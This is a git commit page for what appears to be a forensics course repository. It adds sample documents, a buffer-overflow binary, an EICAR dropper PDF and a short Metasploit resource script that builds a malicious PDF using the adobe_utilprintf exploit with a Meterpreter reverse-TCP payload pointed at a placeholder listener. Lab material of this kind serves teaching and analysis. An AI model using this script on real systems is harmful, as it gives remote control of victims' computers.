diff options
| author | jerome <jerome@xlinfo.fr> | 2023-11-13 01:34:03 +0100 |
|---|---|---|
| committer | jerome <jerome@xlinfo.fr> | 2023-11-13 01:34:03 +0100 |
| commit | 696111049388b5a8f51b02e331b24c6650d4799e (patch) | |
| tree | 38338bd33b598dcb2464bb44d151a37528dd7037 | |
| download | forensic-696111049388b5a8f51b02e331b24c6650d4799e.tar.gz forensic-696111049388b5a8f51b02e331b24c6650d4799e.zip | |
commit initial
| -rw-r--r-- | criminalistique/Sample-Chain-of-Custody-Form.pdf | bin | 0 -> 63058 bytes | |||
| -rwxr-xr-x | criminalistique/letter-image.jpg | bin | 0 -> 127107 bytes | |||
| -rwxr-xr-x | criminalistique/ransom-letter.doc | bin | 0 -> 153088 bytes | |||
| -rwxr-xr-x | criminalistique/ransom-letter.pdf | bin | 0 -> 71371 bytes | |||
| -rw-r--r-- | criminalistique/tp.pdf | bin | 0 -> 61089 bytes | |||
| -rwxr-xr-x | elf/bufferflow | bin | 0 -> 21264 bytes | |||
| -rw-r--r-- | elf/hello.c | 6 | ||||
| -rw-r--r-- | malware/maliciouspdf.rc | 6 | ||||
| -rw-r--r-- | malware/pdf-doc-vba-eicar-dropper.pdf | bin | 0 -> 10381 bytes |
9 files changed, 12 insertions, 0 deletions
diff --git a/criminalistique/Sample-Chain-of-Custody-Form.pdf b/criminalistique/Sample-Chain-of-Custody-Form.pdf Binary files differnew file mode 100644 index 0000000..19f283c --- /dev/null +++ b/criminalistique/Sample-Chain-of-Custody-Form.pdf diff --git a/criminalistique/letter-image.jpg b/criminalistique/letter-image.jpg Binary files differnew file mode 100755 index 0000000..6185682 --- /dev/null +++ b/criminalistique/letter-image.jpg diff --git a/criminalistique/ransom-letter.doc b/criminalistique/ransom-letter.doc Binary files differnew file mode 100755 index 0000000..057c5ed --- /dev/null +++ b/criminalistique/ransom-letter.doc diff --git a/criminalistique/ransom-letter.pdf b/criminalistique/ransom-letter.pdf Binary files differnew file mode 100755 index 0000000..27b8f6f --- /dev/null +++ b/criminalistique/ransom-letter.pdf diff --git a/criminalistique/tp.pdf b/criminalistique/tp.pdf Binary files differnew file mode 100644 index 0000000..e621c82 --- /dev/null +++ b/criminalistique/tp.pdf diff --git a/elf/bufferflow b/elf/bufferflow Binary files differnew file mode 100755 index 0000000..c51098e --- /dev/null +++ b/elf/bufferflow diff --git a/elf/hello.c b/elf/hello.c new file mode 100644 index 0000000..0aa057e --- /dev/null +++ b/elf/hello.c @@ -0,0 +1,6 @@ +#include <stdio.h> +void main(void) +{ + char * hello="Hello World !\n"; + printf (hello); +} diff --git a/malware/maliciouspdf.rc b/malware/maliciouspdf.rc new file mode 100644 index 0000000..71c6c09 --- /dev/null +++ b/malware/maliciouspdf.rc @@ -0,0 +1,6 @@ +use exploit/windows/fileformat/adobe_utilprintf +set FILENAME malicious.pdf +set PAYLOAD windows/meterpreter/reverse_tcp +set LHOST listening_ip +set LPORT tcp_port +exploit diff --git a/malware/pdf-doc-vba-eicar-dropper.pdf b/malware/pdf-doc-vba-eicar-dropper.pdf Binary files differnew file mode 100644 index 0000000..ebd6c4b --- /dev/null +++ b/malware/pdf-doc-vba-eicar-dropper.pdf |
